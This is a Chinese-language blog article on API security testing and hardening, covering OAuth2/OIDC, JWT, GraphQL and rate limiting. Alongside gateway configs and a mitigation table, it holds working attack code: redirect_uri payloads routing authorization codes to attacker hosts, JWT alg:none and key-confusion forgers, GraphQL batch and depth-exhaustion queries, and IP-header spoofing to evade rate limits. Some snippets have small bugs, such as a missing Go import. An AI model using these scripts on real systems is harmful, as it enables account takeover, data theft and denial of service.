跳过正文
  1. 文章列表/

Web API 安全深度剖析:从 OAuth2 绕过到 GraphQL 注入的全景分析

Elone Yue
作者
Elone Yue

执行摘要
#

现代 Web 应用的核心是 API——RESTful、GraphQL、gRPC,它们承载着数据流转和业务逻辑。然而,API 同时也是攻击面最广、漏洞最密集的入口点。OWASP API Security Top 10(2023)中,BOLA(破损的对象级授权)连续位居榜首。本文将深入剖析 OAuth2/OIDC 的认证绕过、GraphQL 注入攻击、Rate Limiting 绕过,以及 API 网关安全加固的完整技术实践。

OAuth 2.0 与 OIDC 深度解析
#

OAuth 2.0 授权码流程
#

标准 OAuth 2.0 授权码流程(RFC 6749)包含以下步骤:

    客户端                      授权服务器                  资源服务器
      │                            │                          │
      │  (1) Authorization Request │                          │
      │◄───────────────────────────┤                          │
      │  redirect_uri + client_id  │                          │
      │                            │                          │
      │  (2) User Authentication   │                          │
      │◄───────────────────────────┤                          │
      │  login + consent           │                          │
      │                            │                          │
      │  (3) Authorization Code    │                          │
      │───────────────────────────►│                          │
      │  code=abc123&state=xyz     │                          │
      │                            │                          │
      │  (4) Token Request         │                          │
      │───────────────────────────►│                          │
      │  code + client_secret      │                          │
      │                            │                          │
      │  (5) Access + Refresh Token│                          │
      │◄───────────────────────────┤                          │
      │                            │                          │
      │  (6) API Request           │                          │
      │──────────────────────────────────────────────────────►│
      │  Authorization: Bearer <token>                        │
      │                            │                          │
      │  (7) Resource Response     │                          │
      │◄──────────────────────────────────────────────────────│

PKCE(Proof Key for Code Exchange)
#

PKCE(RFC 7636)解决了公共客户端(移动端、SPA)在授权码交换过程中可能被截获的问题:

    client                        authorization server
      │                                 │
      │  code_verifier = random(43-128) │
      │  code_challenge = BASE64URL(SHA256(code_verifier))
      │                                 │
      │  Auth Request + code_challenge  │
      │  &code_challenge_method=S256    │
      │◄────────────────────────────────┤
      │                                 │
      │  Authorization Code             │
      │────────────────────────────────►│
      │                                 │
      │  Token Request                  │
      │  + code_verifier                │
      │────────────────────────────────►│
      │                                 │
      │  server verifies:               │
      │  SHA256(code_verifier) ==       │
      │  stored code_challenge          │
      │                                 │
      │  Access Token                   │
      │◄────────────────────────────────┤

实现 PKCE 的 Go 客户端:

package oauth

import (
    "crypto/rand"
    "crypto/sha256"
    "encoding/base64"
    "fmt"
    "net/http"
    "net/url"
)

// PKCE generates code_verifier and code_challenge for OAuth 2.0 PKCE
type PKCE struct {
    CodeVerifier  string
    CodeChallenge string
}

// GeneratePKCE creates a new PKCE challenge pair
func GeneratePKCE() (*PKCE, error) {
    verifierBytes := make([]byte, 32)
    if _, err := rand.Read(verifierBytes); err != nil {
        return nil, fmt.Errorf("failed to generate random bytes: %w", err)
    }

    verifier := base64.RawURLEncoding.EncodeToString(verifierBytes)

    hash := sha256.Sum256([]byte(verifier))
    challenge := base64.RawURLEncoding.EncodeToString(hash[:])

    return &PKCE{
        CodeVerifier:  verifier,
        CodeChallenge: challenge,
    }, nil
}

// BuildAuthorizationURL constructs the OAuth authorization URL with PKCE
func BuildAuthorizationURL(baseURL, clientID, redirectURI, state string, pkce *PKCE) string {
    params := url.Values{}
    params.Set("response_type", "code")
    params.Set("client_id", clientID)
    params.Set("redirect_uri", redirectURI)
    params.Set("state", state)
    params.Set("code_challenge", pkce.CodeChallenge)
    params.Set("code_challenge_method", "S256")
    params.Set("scope", "openid profile email")

    return fmt.Sprintf("%s/authorize?%s", baseURL, params.Encode())
}

// BuildTokenRequest constructs the token exchange request with PKCE verifier
func BuildTokenRequest(baseURL, clientID, code, redirectURI, codeVerifier string) *http.Request {
    data := url.Values{}
    data.Set("grant_type", "authorization_code")
    data.Set("client_id", clientID)
    data.Set("code", code)
    data.Set("redirect_uri", redirectURI)
    data.Set("code_verifier", codeVerifier)

    req, _ := http.NewRequest("POST", baseURL+"/token",
        strings.NewReader(data.Encode()))
    req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
    return req
}

OAuth 2.0 漏洞与绕过技术
#

1. Redirect URI 操作
#

Redirect URI 操纵是最常见的 OAuth 漏洞之一。当授权服务器未对 redirect_uri 进行精确匹配时,攻击者可以截获授权码:

# redirect_uri bypass techniques
BYPASS_PATTERNS = [
    # 子域名匹配绕过 (example.com 匹配 evil.example.com)
    "https://evil.attacker.com?redirect=https://legitimate-app.com/callback",

    # 开放重定向链接
    "https://legitimate-app.com/redirect?url=https://evil.attacker.com",

    # 双 URL 编码
    "https://legitimate%252ecom.attacker.com",

    # URI 前缀匹配绕过
    "https://legitimate-app.com.evil.com/callback",

    # 大小写绕过 (某些实现不区分大小写)
    "https://LEGITIMATE-app.com/callback",

    # 路径注入
    "https://legitimate-app.com/callback#https://evil.attacker.com",

    # @ 符号技巧
    "https://legitimate-app.com@evil.attacker.com",
]

def test_redirect_uri_vulnerability(base_url, client_id):
    """Test various redirect URI bypass techniques."""
    results = []
    for uri in BYPASS_PATTERNS:
        auth_url = (
            f"{base_url}/authorize?"
            f"response_type=code"
            f"&client_id={client_id}"
            f"&redirect_uri={urllib.parse.quote_plus(uri)}"
            f"&state=test123"
        )
        resp = requests.get(auth_url, allow_redirects=False)
        if resp.status_code == 302:
            location = resp.headers.get("Location", "")
            if "error" not in location.lower():
                results.append({
                    "pattern": uri,
                    "status": resp.status_code,
                    "location": location,
                    "vulnerable": True
                })
    return results

2. Token 泄露
#

Token 泄露的常见场景:

  • URL 参数中的 access_token:将 token 放在 URL 中会导致其出现在浏览器历史、代理日志和 Referer 头中
  • implicit grant 类型:token 通过 URL fragment 返回,可被 XSS 或浏览器扩展截获
  • Token 在日志中记录:很多应用在日志中打印完整的请求头
# 检测 token 泄露——搜索日志文件中的 token 模式
$ grep -rE 'access_token=["\']?[A-Za-z0-9._-]{20,}' /var/log/nginx/ --include="*.log"
$ grep -rE 'Bearer\s+[A-Za-z0-9._-]{20,}' /var/log/app/ --include="*.log"

# 在代码仓库中搜索硬编码的 token
$ trufflehog filesystem --no-update --fail /path/to/repo

3. State 参数绕过
#

如果应用未验证 state 参数,攻击者可以发起 CSRF 攻击:

#!/usr/bin/env python3
"""
oauth_csrf_tester.py - Test OAuth state parameter validation
"""

import requests
import urllib.parse
from typing import Dict, Optional


class OAuthCSRFSampler:
    """Test for OAuth CSRF vulnerabilities."""

    def __init__(self, auth_server: str, client_id: str, redirect_uri: str):
        self.auth_server = auth_server
        self.client_id = client_id
        self.redirect_uri = redirect_uri

    def test_missing_state(self) -> Dict:
        """Test if authorization works without state parameter."""
        params = {
            "response_type": "code",
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            # state intentionally omitted
        }
        url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
        resp = requests.get(url, allow_redirects=False)

        return {
            "test": "missing_state",
            "status_code": resp.status_code,
            "redirects_to_callback": resp.status_code == 302 and
                self.redirect_uri in resp.headers.get("Location", ""),
            "vulnerable": resp.status_code == 302,
        }

    def test_empty_state(self) -> Dict:
        """Test if empty state is accepted."""
        params = {
            "response_type": "code",
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            "state": "",
        }
        url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
        resp = requests.get(url, allow_redirects=False)

        return {
            "test": "empty_state",
            "status_code": resp.status_code,
            "redirects_to_callback": resp.status_code == 302 and
                self.redirect_uri in resp.headers.get("Location", ""),
            "vulnerable": resp.status_code == 302,
        }

    def test_state_prediction(self, code: str) -> Dict:
        """Test if state value can be predicted or reused."""
        # Try common state patterns
        states_to_try = ["", "1", "test", code[:10], code[-10:]]

        for state_val in states_to_try:
            params = {
                "response_type": "code",
                "client_id": self.client_id,
                "redirect_uri": self.redirect_uri,
                "state": state_val,
            }
            url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
            resp = requests.get(url, allow_redirects=False)

            if resp.status_code == 302:
                return {
                    "test": "state_prediction",
                    "tried_state": state_val,
                    "vulnerable": True,
                    "redirect": resp.headers.get("Location"),
                }

        return {"test": "state_prediction", "vulnerable": False}

    def run_all_tests(self) -> Dict:
        """Run all CSRF-related OAuth tests."""
        results = {
            "target": self.auth_server,
            "tests": [
                self.test_missing_state(),
                self.test_empty_state(),
            ],
        }
        return results

4. JWT 漏洞利用
#

OIDC 使用 JWT 作为 ID Token,其常见漏洞包括:

#!/usr/bin/env python3
"""
jwt_security_tester.py - Test JWT vulnerabilities in OIDC implementations
"""

import json
import base64
import hmac
import hashlib
from typing import Optional, Dict


class JWTTester:
    """Test common JWT security vulnerabilities."""

    @staticmethod
    def decode_jwt_unverified(token: str) -> Dict:
        """Decode JWT without verification (for analysis)."""
        parts = token.split(".")
        if len(parts) != 3:
            raise ValueError("Invalid JWT format")

        def decode_segment(seg):
            # Add padding
            padding = 4 - len(seg) % 4
            if padding != 4:
                seg += "=" * padding
            return json.loads(base64.urlsafe_b64decode(seg))

        return {
            "header": decode_segment(parts[0]),
            "payload": decode_segment(parts[1]),
            "signature": parts[2],
        }

    def test_alg_none(self, token: str) -> bool:
        """Test if 'alg: none' is accepted."""
        decoded = self.decode_jwt_unverified(token)
        header = decoded["header"]

        if header.get("alg") == "none":
            print("[!] JWT header uses 'alg: none' - signature is not verified")
            return True

        # Attempt alg:none attack
        header["alg"] = "none"
        new_header = base64.urlsafe_b64encode(
            json.dumps(header).encode()
        ).rstrip(b"=").decode()

        payload = token.split(".")[1]
        forged_token = f"{new_header}.{payload}."

        print(f"[*] Forged 'alg:none' token: {forged_token[:50]}...")
        return False  # Need to test against the actual server

    def test_key_confusion(self, token: str, public_key: bytes) -> Optional[str]:
        """Test RS256/HS256 key confusion attack."""
        decoded = self.decode_jwt_unverified(token)

        if decoded["header"].get("alg") != "RS256":
            return None

        # Try to sign with the public key using HMAC
        header = decoded["header"]
        header["alg"] = "HS256"
        new_header = base64.urlsafe_b64encode(
            json.dumps(header).encode()
        ).rstrip(b"=").decode()

        payload = token.split(".")[1]
        signing_input = f"{new_header}.{payload}"

        forged_sig = base64.urlsafe_b64encode(
            hmac.new(public_key, signing_input.encode(), hashlib.sha256).digest()
        ).rstrip(b"=").decode()

        forged_token = f"{signing_input}.{forged_sig}"
        return forged_token

    def test_jwk_header_injection(self, token: str) -> bool:
        """Test JWK header injection (CVE-2018-0114 / CVE-2018-1000583)."""
        decoded = self.decode_jwt_unverified(token)
        header = decoded["header"]

        # Check if jwk or jku is in the header
        if "jwk" in header or "jku" in header:
            print(f"[!] JWT uses {'jwk' if 'jwk' in header else 'jku'} header")
            print(f"    Header: {json.dumps(header, indent=2)}")
            return True
        return False

    def analyze_token(self, token: str) -> Dict:
        """Full JWT analysis."""
        decoded = self.decode_jwt_unverified(token)

        analysis = {
            "algorithm": decoded["header"].get("alg", "unknown"),
            "type": decoded["header"].get("typ", "unknown"),
            "issuer": decoded["payload"].get("iss"),
            "audience": decoded["payload"].get("aud"),
            "subject": decoded["payload"].get("sub"),
            "expires_at": decoded["payload"].get("exp"),
            "issued_at": decoded["payload"].get("iat"),
            "has_jwk": "jwk" in decoded["header"],
            "has_jku": "jku" in decoded["header"],
            "has_x5u": "x5u" in decoded["header"],
            "custom_claims": [
                k for k in decoded["payload"].keys()
                if k not in ["iss", "sub", "aud", "exp", "iat", "nbf", "jti",
                             "email", "email_verified", "name", "picture"]
            ],
        }

        return analysis

GraphQL 安全深度分析
#

内省查询滥用
#

GraphQL 的内省机制允许客户端查询 schema 信息,这在开发环境中非常有用,但在生产环境中会成为信息泄露的源头:

# 标准内省查询 - 获取完整的 schema 信息
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      ...FullType
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
        }
      }
    }
  }
}

内省查询的 Python 自动化脚本:

#!/usr/bin/env python3
"""
graphql_recon.py - GraphQL introspection and reconnaissance tool
"""

import json
import requests
from typing import Dict, List, Optional, Tuple


class GraphQLRecon:
    """GraphQL endpoint reconnaissance and vulnerability discovery."""

    INTROSPECTION_QUERY = """
    query {
      __schema {
        queryType { name }
        mutationType { name }
        types {
          kind
          name
          fields { name type { name kind ofType { name } } }
          inputFields { name type { name kind ofType { name } } }
          enumValues { name }
        }
        directives { name locations args { name type { name } } }
      }
    }
    """

    def __init__(self, endpoint: str, headers: Optional[Dict] = None):
        self.endpoint = endpoint
        self.headers = headers or {
            "Content-Type": "application/json",
            "Accept": "application/json",
        }
        self.schema_info = {}

    def check_introspection(self) -> bool:
        """Check if introspection is enabled."""
        try:
            resp = requests.post(
                self.endpoint,
                json={"query": self.INTROSPECTION_QUERY},
                headers=self.headers,
                timeout=10,
            )
            if resp.status_code == 200:
                data = resp.json()
                if "__schema" in data.get("data", {}):
                    self.schema_info = data["data"]["__schema"]
                    return True
                if "errors" in data:
                    for err in data["errors"]:
                        if "introspection" in err.get("message", "").lower():
                            return False
            return False
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
            return False

    def enumerate_types(self) -> List[Dict]:
        """Enumerate all types from the schema."""
        if not self.schema_info:
            return []

        types = []
        for t in self.schema_info.get("types", []):
            if t["name"].startswith("__"):
                continue  # Skip internal types
            types.append({
                "name": t["name"],
                "kind": t["kind"],
                "fields": [f["name"] for f in (t.get("fields") or [])],
                "input_fields": [f["name"] for f in (t.get("inputFields") or [])],
                "enum_values": [e["name"] for e in (t.get("enumValues") or [])],
            })
        return types

    def enumerate_queries(self) -> List[Dict]:
        """List all available queries."""
        if not self.schema_info:
            return []

        query_type_name = self.schema_info.get("queryType", {}).get("name", "Query")
        for t in self.schema_info.get("types", []):
            if t["name"] == query_type_name:
                return [
                    {
                        "name": f["name"],
                        "args": [
                            {
                                "name": a["name"],
                                "type": a["type"].get("name") or
                                    a["type"].get("ofType", {}).get("name"),
                            }
                            for a in (f.get("args") or [])
                        ],
                    }
                    for f in (t.get("fields") or [])
                ]
        return []

    def enumerate_mutations(self) -> List[Dict]:
        """List all available mutations."""
        if not self.schema_info:
            return []

        mutation_type = self.schema_info.get("mutationType")
        if not mutation_type:
            return []

        mutation_type_name = mutation_type.get("name", "Mutation")
        for t in self.schema_info.get("types", []):
            if t["name"] == mutation_type_name:
                return [
                    {
                        "name": f["name"],
                        "args": [
                            {
                                "name": a["name"],
                                "type": a["type"].get("name") or
                                    a["type"].get("ofType", {}).get("name"),
                            }
                            for a in (f.get("args") or [])
                        ],
                    }
                    for f in (t.get("fields") or [])
                ]
        return []

    def test_batch_query(self, query: str, variables: Optional[Dict] = None, batch_size: int = 10) -> Dict:
        """Test GraphQL batch query processing."""
        batch = [{"query": query, "variables": variables} for _ in range(batch_size)]

        resp = requests.post(
            self.endpoint,
            json=batch,
            headers=self.headers,
            timeout=15,
        )

        return {
            "status_code": resp.status_code,
            "batch_supported": resp.status_code == 200 and isinstance(resp.json(), list),
            "response_count": len(resp.json()) if isinstance(resp.json(), list) else 1,
            "response": resp.text[:500],
        }

    def test_depth_exhaustion(self, max_depth: int = 20) -> Dict:
        """Test for GraphQL depth exhaustion (DoS)."""
        # Build a deeply nested query
        def build_nested_query(type_name: str, depth: int) -> str:
            if depth <= 0:
                return "id"
            return f"""
            {type_name} {{
                id
                children {{
                    {build_nested_query(type_name, depth - 1)}
                }}
            }}
            """

        results = {}
        for depth in [5, 10, 15, max_depth]:
            query = f"query {{ {build_nested_query('Node', depth)} }}"
            import time
            start = time.time()
            try:
                resp = requests.post(
                    self.endpoint,
                    json={"query": query},
                    headers=self.headers,
                    timeout=30,
                )
                elapsed = time.time() - start
                results[depth] = {
                    "status": resp.status_code,
                    "elapsed_seconds": round(elapsed, 3),
                    "error": "timeout" if elapsed >= 30 else None,
                }
            except requests.Timeout:
                results[depth] = {
                    "status": "timeout",
                    "elapsed_seconds": 30,
                    "error": "timeout",
                }

        return results

    def run_recon(self) -> Dict:
        """Run full reconnaissance."""
        print(f"[*] Checking introspection at {self.endpoint}...")
        introspection_enabled = self.check_introspection()

        if not introspection_enabled:
            print("[-] Introspection is disabled")
            return {"introspection": False}

        print(f"[+] Introspection enabled. Enumerating schema...")

        return {
            "introspection": True,
            "queries": self.enumerate_queries(),
            "mutations": self.enumerate_mutations(),
            "types": self.enumerate_types(),
        }


if __name__ == "__main__":
    import sys

    endpoint = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4000/graphql"
    recon = GraphQLRecon(endpoint)
    results = recon.run_recon()

    if results.get("introspection"):
        print(f"\n[+] Found {len(results['queries'])} queries")
        print(f"[+] Found {len(results['mutations'])} mutations")
        print(f"[+] Found {len(results['types'])} types")

        for q in results["queries"]:
            print(f"    Query: {q['name']}")
        for m in results["mutations"]:
            print(f"    Mutation: {m['name']}")

批量查询攻击
#

GraphQL 支持在单个请求中发送多个操作。如果未做限制,攻击者可以:

  1. 绕过 rate limiting:一次请求执行多个操作
  2. 暴力破解:批量执行登录查询
  3. 数据批量泄露:一次性获取大量数据
# 批量注入攻击示例
BATCH_ATTACKS = [
    # 批量查询 - 绕过 rate limit
    {
        "query": """
        query {
          user1: user(id: "1") { email password_hash }
          user2: user(id: "2") { email password_hash }
          user3: user(id: "3") { email password_hash }
          user4: user(id: "4") { email password_hash }
          user5: user(id: "5") { email password_hash }
        }
        """
    },

    # 别名混淆 - 绕过字段级权限
    {
        "query": """
        query {
          a: user(id: "1") { email }
          b: user(id: "1") { ssn }
          c: user(id: "1") { creditCard }
        }
        """
    },
]

深度耗尽攻击
#

GraphQL 的嵌套查询可以构造出指数级复杂度的查询,导致 DoS:

# 深度耗尽攻击 - 构造深层嵌套查询
query DeepRecursion {
  departments {
    employees {
      manager {
        department {
          employees {
            manager {
              department {
                # ... can be nested arbitrarily deep
                employees {
                  salary
                  ssn
                }
              }
            }
          }
        }
      }
    }
  }
}

Rate Limiting 绕过技术
#

IP 欺骗头
#

#!/usr/bin/env python3
"""
rate_limit_bypass.py - Test rate limiting bypass techniques
"""

import requests
import time
from itertools import product
from typing import Dict, List


class RateLimitBypassTester:
    """Test various rate limiting bypass techniques."""

    # Common IP forwarding headers that some gateways trust
    IP_HEADERS = [
        "X-Forwarded-For",
        "X-Real-IP",
        "X-Client-IP",
        "X-Forwarded",
        "Forwarded",
        "X-Cluster-Client-IP",
        "X-Original-Remote-Addr",
        "CF-Connecting-IP",          # Cloudflare
        "True-Client-IP",            # Akamai
        "Fastly-Client-Ip",          # Fastly
        "WL-Proxy-Client-IP",        # WebLogic
    ]

    # Common bypass IP values
    BYPASS_IPS = [
        "127.0.0.1",
        "localhost",
        "10.0.0.1",
        "192.168.1.1",
        "172.16.0.1",
        "0.0.0.0",
        "::1",
        # Multi-IP chain (some gateways use first IP)
        "127.0.0.1, 8.8.8.8",
        "10.0.0.1, 8.8.8.8",
    ]

    def __init__(self, target_url: str, method: str = "POST",
                 payload: Dict = None, headers: Dict = None):
        self.target_url = target_url
        self.method = method.upper()
        self.payload = payload or {}
        self.default_headers = headers or {"Content-Type": "application/json"}

    def test_ip_header_spoofing(self, num_requests: int = 5) -> List[Dict]:
        """Test if spoofing IP headers bypasses rate limiting."""
        results = []

        for header in self.IP_HEADERS:
            for ip in self.BYPASS_IPS:
                test_headers = self.default_headers.copy()
                test_headers[header] = ip

                try:
                    if self.method == "POST":
                        resp = requests.post(
                            self.target_url,
                            json=self.payload,
                            headers=test_headers,
                            timeout=10,
                        )
                    else:
                        resp = requests.get(
                            self.target_url,
                            headers=test_headers,
                            timeout=10,
                        )

                    is_rate_limited = resp.status_code in (429, 503)

                    results.append({
                        "header": header,
                        "ip": ip,
                        "status": resp.status_code,
                        "rate_limited": is_rate_limited,
                        "rate_limit_remaining": resp.headers.get("X-RateLimit-Remaining"),
                        "rate_limit_reset": resp.headers.get("X-RateLimit-Reset"),
                        "retry_after": resp.headers.get("Retry-After"),
                        "bypass_successful": not is_rate_limited,
                    })
                except requests.RequestException as e:
                    results.append({
                        "header": header,
                        "ip": ip,
                        "error": str(e),
                    })

        return results

    def test_parameter_pollution(self, num_requests: int = 5) -> List[Dict]:
        """Test HTTP parameter pollution for rate limit bypass."""
        results = []

        # Test with duplicate parameters
        pollution_variants = [
            {"api_key": ["key1", "key2"]},
            {"user_id": ["1", "2", "3"]},
            {"token": ["a" * 32, "b" * 32]},
        ]

        for variant in pollution_variants:
            payload = self.payload.copy()
            payload.update(variant)

            resp = requests.post(
                self.target_url,
                json=payload,
                headers=self.default_headers,
                timeout=10,
            )

            results.append({
                "variant": str(variant),
                "status": resp.status_code,
                "rate_limited": resp.status_code in (429, 503),
            })

        return results

    def test_timing_based_bypass(self, interval: float = 0.5,
                                  num_requests: int = 20) -> List[Dict]:
        """Test if slow-and-steady requests bypass rate limits."""
        results = []

        for i in range(num_requests):
            start = time.time()
            resp = requests.post(
                self.target_url,
                json=self.payload,
                headers=self.default_headers,
                timeout=10,
            )
            elapsed = time.time() - start

            results.append({
                "request_number": i + 1,
                "interval": interval,
                "status": resp.status_code,
                "elapsed": round(elapsed, 3),
                "rate_limited": resp.status_code in (429, 503),
            })

            time.sleep(interval)

        return results

    def run_full_test(self) -> Dict:
        """Run all rate limiting bypass tests."""
        print(f"[*] Testing rate limit bypass against {self.target_url}")
        print(f"[*] Phase 1: IP header spoofing...")
        ip_results = self.test_ip_header_spoofing()

        successful_bypasses = [r for r in ip_results if r.get("bypass_successful")]
        print(f"    Found {len(successful_bypasses)} potential bypasses")

        print(f"[*] Phase 2: Parameter pollution...")
        pollution_results = self.test_parameter_pollution()

        print(f"[*] Phase 3: Timing-based bypass...")
        timing_results = self.test_timing_based_bypass()

        return {
            "ip_spoofing": ip_results,
            "parameter_pollution": pollution_results,
            "timing": timing_results,
        }

API 网关安全加固
#

Kong 网关安全配置
#

# kong.yaml - Secure Kong gateway configuration
_format_version: "3.0"

services:
  - name: api-backend
    url: http://backend:8080
    routes:
      - name: api-route
        paths:
          - /api/
        strip_path: false

    plugins:
      # Rate limiting
      - name: rate-limiting
        config:
          second: 100
          minute: 5000
          hour: 100000
          policy: redis
          redis:
            host: redis-rate-limit
            port: 6379

      # Request size limit
      - name: request-size-limiting
        config:
          allowed_payload_sizes:
            - 1048576  # 1MB

      # CORS
      - name: cors
        config:
          origins:
            - "https://app.techorigin.dev"
          methods:
            - GET
            - POST
          headers:
            - Authorization
            - Content-Type
          max_age: 3600

      # JWT validation
      - name: jwt
        config:
          claims_to_verify:
            - exp

      # Bot detection
      - name: bot-detection
        config:
          allow_bots: false
          restricted_agents:
            - "sqlmap"
            - "nikto"
            - "nmap"

      # IP restriction
      - name: ip-restriction
        config:
          allow:
            - 10.0.0.0/8
            - 172.16.0.0/12
            - 192.168.0.0/16

      # OAuth2 authentication
      - name: oauth2
        config:
          scopes:
            - read
            - write
            - admin
          mandatory_scope: true
          token_expiration: 3600
          enable_client_credentials: true
          hide_token_hash: true

APISIX 安全配置
#

# APISIX security configuration
routes:
  - uri: /api/*
    plugins:
      jwt-auth:
        secret: "${JWT_SECRET}"
        algorithm: HS256

      limit-req:
        rate: 100
        burst: 200
        key: remote_addr
        rejected_code: 429

      cors:
        allow_origins: "https://app.techorigin.dev"
        allow_methods: "GET,POST,PUT,DELETE"
        allow_headers: "Authorization,Content-Type,X-Request-ID"

      request-id:
        prefix: "req-"

      fault-injection:  # Only in testing
        abort:
          http_status: 500
          body: '{"error":"test"}'

      response-rewrite:
        headers:
          X-Frame-Options: "DENY"
          X-Content-Type-Options: "nosniff"
          Strict-Transport-Security: "max-age=31536000; includeSubDomains"

Envoy 安全过滤器链
#

# envoy.yaml - Secure Envoy proxy configuration
static_resources:
  listeners:
    - name: api_listener
      address:
        socket_address:
          address: 0.0.0.0
          port_value: 8443
      filter_chains:
        - filters:
            - name: envoy.filters.network.http_connection_manager
              typed_config:
                "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
                stat_prefix: ingress_https
                codec_type: AUTO
                route_config:
                  name: local_route
                  virtual_hosts:
                    - name: api
                      domains: ["api.techorigin.dev"]
                      routes:
                        - match:
                            prefix: "/api/"
                          route:
                            cluster: api_backend
                            timeout: 30s
                            retry_policy:
                              retry_on: "5xx"
                              num_retries: 3
                      response_headers_to_add:
                        - header:
                            key: "X-Frame-Options"
                            value: "DENY"
                        - header:
                            key: "X-Content-Type-Options"
                            value: "nosniff"
                        - header:
                            key: "Strict-Transport-Security"
                            value: "max-age=31536000; includeSubDomains"
                        - header:
                            key: "X-XSS-Protection"
                            value: "1; mode=block"
                http_filters:
                  # External authorization (JWT validation)
                  - name: envoy.ext_authz
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.ext_authz.v3.ExtAuthz
                      transport_api_version: V3
                      failure_mode_allow: false
                      with_request_body:
                        allow_partial: true
                        max_request_bytes: 8192
                  # Rate limiting
                  - name: envoy.rate_limit
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.ratelimit.v3.RateLimit
                      domain: api_ratelimit
                      timeout: 10ms
                  # RBAC
                  - name: envoy.filters.http.rbac
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.rbac.v3.RBAC
                      rules:
                        policies:
                          "api-access":
                            permissions:
                              - header:
                                  name: ":path"
                                  string_match:
                                    prefix: "/api/"
                            principals:
                              - authenticated:
                                  principal_name:
                                    prefix: "spiffe://"
                  # Router
                  - name: envoy.filters.http.router
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router

Burp Suite 自动化扫描
#

Burp 扩展脚本
#

"""
api_security_scanner.py - Burp Suite extension for automated API security testing
Implements custom scanner checks for OAuth2 and GraphQL vulnerabilities
"""

from burp import IScannerCheck
from burp import IScanIssue
import json


class APISecurityScanner(IScannerCheck):
    """Custom Burp scanner check for API security issues."""

    def doPassiveScan(self, baseRequestResponse):
        issues = []
        url = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
        content_type = self._get_header(
            baseRequestResponse, "Content-Type"
        )

        # Check 1: Missing security headers
        response_headers = self._helpers.analyzeResponse(baseRequestResponse.getResponse())
        required_headers = {
            "Strict-Transport-Security": "Missing HSTS header",
            "X-Content-Type-Options": "Missing X-Content-Type-Options",
            "X-Frame-Options": "Missing X-Frame-Options",
        }

        for header, desc in required_headers.items():
            if not any(header.lower() in h.lower()
                      for h in response_headers.getHeaders()):
                issues.append(
                    CustomScanIssue(
                        url,
                        header,
                        desc,
                        "Information",
                        "Certain"
                    )
                )

        # Check 2: OAuth token in URL
        request = self._helpers.bytesToString(baseRequestResponse.getRequest())
        if "access_token=" in url.lower():
            issues.append(
                CustomScanIssue(
                    url,
                    "access_token_in_url",
                    "OAuth access token exposed in URL parameters",
                    "High",
                    "Firm"
                )
            )

        # Check 3: Verbose error messages in API responses
        response_body = self._helpers.bytesToString(
            baseRequestResponse.getResponse()[response_headers.getBodyOffset():]
        )

        error_patterns = [
            "stack trace",
            "Traceback (most recent call last)",
            "at org.springframework",
            "at com.mongodb",
            "SQLSTATE",
            "java.lang.NullPointerException",
            "Internal Server Error",
            "PDOException",
        ]

        for pattern in error_patterns:
            if pattern.lower() in response_body.lower():
                issues.append(
                    CustomScanIssue(
                        url,
                        "verbose_error",
                        f"Verbose error message detected: '{pattern}'",
                        "Medium",
                        "Tentative"
                    )
                )
                break

        return issues if issues else None

    def _get_header(self, request_response, header_name):
        headers = self._helpers.analyzeRequest(request_response).getHeaders()
        for h in headers:
            if h.lower().startswith(header_name.lower() + ":"):
                return h.split(": ", 1)[1] if ": " in h else ""
        return None

    def consolidateDuplicateIssues(self, existing, newIssue):
        if existing.getUrl() == newIssue.getUrl() and \
           existing.getIssueName() == newIssue.getIssueName():
            return existing
        return None


class CustomScanIssue(IScanIssue):
    """Custom scan issue implementation."""

    def __init__(self, url, issue_name, detail, severity, confidence):
        self._url = url
        self._name = issue_name
        self._detail = detail
        self._severity = severity
        self._confidence = confidence

    def getUrl(self):
        return self._url

    def getIssueName(self):
        return self._name

    def getIssueType(self):
        return 0x02000000  # Custom type

    def getSeverity(self):
        return self._severity

    def getConfidence(self):
        return self._confidence

    def getIssueDetail(self):
        return self._detail

    def getRemediationDetail(self):
        return f"Fix the {self._name} issue in the API response."

    def getHttpMessages(self):
        return None

    def getHttpService(self):
        return None

防御建议总结
#

威胁类型 防御措施 验证方法
OAuth redirect 劫持 精确匹配 redirect_uri + PKCE 测试各种 redirect 变体
Token 泄露 不在 URL 中传 token;短期 TTL 扫描日志和代码库
State 参数 CSRF 强制 state 验证 + 绑定 session 省略/修改 state 重放
JWT 算法攻击 固定 alg 验证 + 密钥隔离 alg:none 注入测试
GraphQL 内省泄露 生产环境禁用内省 发送内省查询
GraphQL DoS 查询深度/复杂度限制 深度递归查询测试
Rate limit 绕过 多维度限流(IP + User + API Key) 测试各种 IP 头
API 信息泄露 最小化响应字段 + 统一错误格式 分析错误响应

API 安全的核心原则是:永远不要信任客户端输入、最小化暴露的信息、实施零信任架构。通过自动化工具进行持续测试,结合人工审计覆盖工具无法检测的逻辑漏洞,才能构建真正健壮的 API 安全体系。